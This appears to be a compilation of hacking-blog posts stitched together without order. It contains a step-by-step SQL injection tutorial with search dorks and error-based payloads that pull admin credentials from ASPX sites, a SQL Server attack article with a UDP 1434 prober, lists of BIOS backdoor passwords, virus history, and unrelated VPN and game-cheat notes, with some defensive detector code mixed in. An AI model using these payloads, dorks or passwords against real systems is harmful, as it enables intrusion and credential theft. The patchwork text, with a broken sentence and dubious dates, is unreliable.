Protocols: IEEE 802.2, 802.3, 802.5.


LAYER 1 - PHYSICAL

 The physical layer is responsible for establishing, maintaining and ending physical connections (point to point) between computers. This layer is concerned with the actual interpretation of the bit stream into an electrical signal that can be carried across a physical medium. The protocols at this layer deal with the binary transmission, voltage levels, and data rates. This layer would also specify physical medium properties such as cables and network cards.
Protocols: IEEE 802.3, 802.5.

-by Kali Linux

Hack Website

Hacking Aspx websites

How to make an injection on an ASPX-based website.

1) Search for an ASPX website.
For this step you can use one of these dorks:
".aspx?bookID="
".aspx?cart="
".aspx?cartID="
".aspx?catalogid="
".aspx?category_list="
".aspx?CategoryID="
".aspx?catID="
".aspx?cid="
".aspx?code_no="
".aspx?code="
".aspx?designer="
".aspx?framecode="
".aspx?id="
".aspx?idcategory="
".aspx?idproduct="
".aspx?intCatalogID="
".aspx?intProdId="
".aspx?item_id="
".aspx?item="
".aspx?itemID="
".aspx?maingroup="
".aspx?misc="
".aspx?newsid="
".aspx?order_id="
".aspx?p="
".aspx?pid="
".aspx?ProdID="
".aspx?product_id="
".aspx?product="
".aspx?productid="
".aspx?showtopic="
".aspx?Sku="
".aspx?storeid="
".aspx?style_id="
".aspx?StyleID="
".aspx?userID="
".aspx?Id="

2) If you found one, let's check if the website is vulnerable. Add this text after the URL:
"order by 1--"
example : http://www.target.com/index.aspx?Id=1 order by 1--
Now you will get an error: "Page not found" or something like that.

3) Let's go on and begin with the injection. The first step of every injection is to find out the columns.
For this step we use:
"having 1=1"
You only have to copy it behind the URL.
example : http://www.target.com/index.aspx?Id=1 having 1=1

4) Well, let's go on and search for the tables. Use this code for it:
and 1=convert
example : http://www.target.com/index.aspx?Id=1 and 1=convert
The output is the first table of the database. But this table doesn't help you.
You need to find the admin table.
Use this query to get the next table:
"and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))"

example : http://www.target.com/index.aspx?Id=1 and 1=convert
(int,(select top 1 table_name from information_schema.tables where
table_name not in ('Tab_FinalOrder')))

Now we get the name of the admin table. The admin table name in this example is "Administration".

5) Now let's get into the table Administration.
Use this query for it:
and 1=convert

"(int,(select top 1 column_name from information_schema.
columns where table_name = 'AdminMaster'))"

example : http://www.target.com/index.aspx?Id=1 and 1=convert
(int,(select top 1 column_name from information_schema.
columns where table_name = 'AdminMaster'))

6) Our results are the columns "AdminName" and "AdminPassword".
Now we have done most of this injection. The last step is to find out the admin name and admin password.

Query for Admin name :
"and 1=convert(int,(select top 1 AdminName from Administration))"
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminName from Administration))

Query for Admin pass :
"and 1=convert(int,(select top 1 AdminPassword from Administration))"
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminPassword from Administration))

7) So now you are nearly finished. You only need to find the admin login panel.
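For the defensive side of the sequence walked through above, here is an added Python example (not from the original post) that classifies requested URLs against the probes it uses: the trailing order by ... --, the having 1=1 column probe, and the convert(int,(select ...)) error-based extraction against information_schema. Parameter values are URL-decoded (twice, to catch double encoding), whitespace-normalised and lower-cased before matching. The signatures are constructed for this example; they are a detection aid, not a substitute for parameterised queries in the application itself.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Signatures for the probing sequence the post walks through, matched on decoded,
# lower-cased, whitespace-normalised parameter values. Constructed for this example.
SIGNATURES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+\s*--")),
    ("having-probe",   re.compile(r"\bhaving\s+1\s*=\s*1\b")),
    ("convert-error",  re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b")),
    ("schema-enum",    re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
]


def normalise(value):
    """Decode twice (catches %2520-style double encoding), collapse whitespace, lower-case."""
    value = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", value).lower()


def classify_url(url):
    """Return (parameter, signature) pairs for every query parameter matching a signature."""
    hits = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = normalise(raw)
        for sig_name, rx in SIGNATURES:
            if rx.search(text):
                hits.append((name, sig_name))
    return hits


def scan_urls(urls):
    """Classify a batch of requested URLs; returns only the ones with hits."""
    report = {}
    for url in urls:
        hits = classify_url(url)
        if hits:
            report[url] = hits
    return report


# Constructed sample: the post's own example URLs next to a normal request.
SAMPLE_URLS = [
    "http://www.target.com/index.aspx?Id=1",
    "http://www.target.com/index.aspx?Id=1 order by 1--",
    "http://www.target.com/index.aspx?Id=1%20having%201%3D1",
    "http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 table_name "
    "from information_schema.tables where table_name not in ('Tab_FinalOrder')))",
]

if __name__ == "__main__":
    for url, hits in scan_urls(SAMPLE_URLS).items():
        print(hits, url)
```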

Setup open VPN

How to Setup FreevpnMe using openVPN

  1. Download OpenVPN from here
  2. Install the OpenVPN client
  3. Get the FreeVPN.me credentials and client bundle from here
  4. Extract the client bundle and copy the configuration files
  5. Open C:\Program Files\OpenVPN\config and paste the files into this directory
  6. Right-click the OpenVPN tray icon; it will list all the connections contained in the client bundle
  7. Select one and click Connect
  8. Provide the username and password
  9. That's it, you're done. Enjoy

Hack T-REX Game Chrome

On the console (press F12) enter the following lines:

var defaultGameOver = Runner.prototype.gameOver;   // take a backup of the original function

Runner.prototype.gameOver = function () { console.log("sdsdsdsd"); };   // ghost dino: a collision no longer ends the game

Runner.instance_.setSpeed(1500);   // speed

Runner.prototype.gameOver = defaultGameOver;   // restore the original behaviour

* Here what we do is simply replace the gameOver function *

eg Config:

Runner.config = {
  ACCELERATION: 0.001,
  BG_CLOUD_SPEED: 0.2,
  BOTTOM_PAD: 10,
  CLEAR_TIME: 3000,
  CLOUD_FREQUENCY: 0.5,
  GAMEOVER_CLEAR_TIME: 750,
  GAP_COEFFICIENT: 0.6,
  GRAVITY: 0.6,
  INITIAL_JUMP_VELOCITY: 12,
  MAX_CLOUDS: 12,
  MAX_OBSTACLE_LENGTH: 1,
  MAX_SPEED: 12,
  MIN_JUMP_HEIGHT: 35,
  MOBILE_SPEED_COEFFICIENT: 1.2,
  RESOURCE_TEMPLATE_ID: 'audio-resources',
  SPEED: 6,
  SPEED_DROP_COEFFICIENT: 3
};

Thursday, October 29, 2015

exploit SQL servers

10 methods to exploit SQL servers :


Whether it is through manual poking and prodding or the use of security tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason, then, that if the hackers are doing it, you need to carry out the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, the SQL Server Resolution Service (the SQL Browser service on newer versions) lets you find hidden database systems. Chip Andrews' SQLPing v2.5 is a great tool for locating SQL Server systems and determining their version numbers (roughly). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
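What SQLPing does on the wire, as an added example (Python written for this page, not SQLPing's own code or the article's): one byte to UDP 1434 makes every instance answer with its name, version and the TCP port it actually listens on, which is exactly how instances on non-default ports get found. The host names, instance names, versions and ports in SAMPLE_RESPONSE are constructed so the parser can be exercised offline; probe() does the real exchange.

```python
"""Probe and decode the SQL Server Resolution Service (UDP 1434).

Added example; not code from the original article or from SQLPing. It speaks
the SQL Server Resolution Protocol: a one-byte request, CLNT_BCAST_EX (0x02)
to the broadcast address or CLNT_UCAST_EX (0x03) to one host, and each
instance answers with SVR_RESP: byte 0x05, a little-endian 16-bit length,
then an ASCII run of key;value pairs with ';;' closing each instance record.
SAMPLE_RESPONSE is constructed data so the parser runs offline.
"""
import socket
import struct
from typing import Dict, List, Tuple

SSRP_PORT = 1434
CLNT_BCAST_EX = b"\x02"   # everyone on the subnet answers
CLNT_UCAST_EX = b"\x03"   # one host answers
SVR_RESP = 0x05


def parse_ssrp_response(data: bytes) -> List[Dict[str, str]]:
    """Turn one SVR_RESP datagram into a dict per instance."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    (length,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):
        fields = record.split(";")
        if len(fields) < 2:
            continue  # trailing empty record after the final ';;'
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def tcp_endpoints(instances: List[Dict[str, str]]) -> List[Tuple[str, int]]:
    """(instance name, TCP port) for every instance that exposes a TCP listener."""
    return [(i.get("InstanceName", "?"), int(i["tcp"])) for i in instances if "tcp" in i]


def probe(host: str, timeout: float = 2.0, broadcast: bool = False) -> List[Dict[str, str]]:
    """Send one request and parse the first reply.

    With broadcast=True, host is the subnet broadcast address; every SQL Server
    host replies separately, so loop on recvfrom() until the timeout if you
    want all of them rather than the first.
    """
    request = CLNT_BCAST_EX if broadcast else CLNT_UCAST_EX
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        if broadcast:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        sock.sendto(request, (host, SSRP_PORT))
        data, _ = sock.recvfrom(65535)
    return parse_ssrp_response(data)


# Constructed reply: a default instance on 1433 and a second instance on a
# non-default port, the case the Resolution Service gives away.
_SAMPLE_BODY = (
    b"ServerName;SQLBOX;InstanceName;MSSQLSERVER;IsClustered;No;Version;10.50.1600.1;tcp;1433;;"
    b"ServerName;SQLBOX;InstanceName;PAYROLL;IsClustered;No;Version;12.0.2000.8;tcp;51234;;"
)
SAMPLE_RESPONSE = bytes([SVR_RESP]) + struct.pack("<H", len(_SAMPLE_BODY)) + _SAMPLE_BODY
```

Two caveats: the reply only lists instances the Browser service knows about, and a UDP answer is trivially spoofable, so confirm a port by connecting to it. Defensively, the same request tells you whether UDP 1434 is reachable from places it should not be; if every instance runs on a fixed port, the Browser service can be stopped.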

4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). This is yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors and more. I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector.

7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's

8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.

9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors, such as "Incorrect syntax near", leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's "site:" operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break-in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
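A quick way to do that perusing on your own code base before someone else does, added here as an example (not from the original article): a scanner for the ADO/OLE DB connection strings that ASP pages embed. The sample ASP text is constructed for the demonstration; the key names it looks for (User ID/uid, Password/pwd, Server/Data Source) are the standard connection-string keywords.

```python
"""Find SQL Server credentials embedded in web application source.

Added example for the 'perusing Web site source code' point; not part of the
original article. It looks for connection-string key=value pairs on each line
and reports the server, user and a masked password for every line that carries
a password, so the findings can be shared without leaking the secret itself.
SAMPLE_ASP is constructed data.
"""
import re
from typing import List, Tuple

USER_KEYS = ("user id", "uid", "user")
PASS_KEYS = ("password", "pwd")
# Standard connection-string keywords; values run until ';' or a closing quote.
PAIR = re.compile(
    r"(?i)\b(user id|uid|user|password|pwd|server|data source|initial catalog|database)"
    r"\s*=\s*([^;\"']*)"
)


def mask(secret: str) -> str:
    """Keep one character so two hits with the same password can be correlated."""
    return secret[:1] + "*" * (len(secret) - 1) if secret else "<empty>"


def find_credentials(text: str) -> List[Tuple[int, str, str, str]]:
    """(line number, server, user, masked password) for each line carrying a password."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        fields = {key.lower(): value.strip() for key, value in PAIR.findall(line)}
        password = next((fields[k] for k in PASS_KEYS if k in fields), None)
        if password is None:
            continue
        user = next((fields[k] for k in USER_KEYS if k in fields), "?")
        server = fields.get("server") or fields.get("data source") or "?"
        hits.append((number, server, user, mask(password)))
    return hits


# Constructed classic-ASP page: one blank sa password, one hard-coded read-only login.
SAMPLE_ASP = """<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=SQLOLEDB;Data Source=SQL01;Initial Catalog=shop;User ID=sa;Password=;"
' legacy reporting connection
Set rpt = Server.CreateObject("ADODB.Connection")
rpt.Open "Driver={SQL Server};Server=SQL02;Database=reports;Uid=report_ro;Pwd=Summer2015!"
Response.Write "ok"
%>"""
```

Run find_credentials() over every .asp, .inc, .config and .vb file in the web root. A hit whose password shows as <empty> is the blank-sa situation from point 4 above, and any hit at all means the credentials belong in a protected configuration store rather than in script source.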

Enjoy !
-Shubham.

Evolution Of Computer Viruses and Worms

part 1


Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

Going back to the origin of viruses, it was in 1949 that the mathematician John von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players' computers. The creators of this peculiar game also created the first antivirus, an application named Reaper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious code that are known today started being developed: the first macro viruses appeared, polymorphic viruses... Some of these even triggered epidemics, such as Michelangelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.



part 2


This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time.  In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention.  Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.



part 3


This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.



part 4


In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some virus creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services.  Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computers’ hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite, have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this.


part 5


Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.



part 6


Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Cloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far fewer programmers know assembler than are familiar with high-level languages, which are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their Turbo C and Turbo Pascal versions. This ultimately led to the appearance of "virus families": that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -designed to steal personal information from infected computers-  were identified.

part 7

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses; as these developed, so did worldwide epidemics, the first of which was caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through an interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint became ways of spreading 'lethal weapons', which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out is VBS/LoveLetter, more commonly known as 'I Love You', which emerged in May 2000 and caused an epidemic with damage estimated at 10,000 million euros. To get the user's attention and help it spread, this worm sent itself out in an e-mail message with the subject 'ILOVEYOU' and an attached file called 'LOVE-LETTER-FOR-YOU.TXT.VBS'. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.

How to Bypass BIOS Passwords

How to Bypass BIOS Passwords
-  LabMice.net

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used either to prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered by the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS password.

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this is laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without also resetting the hard drive password, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

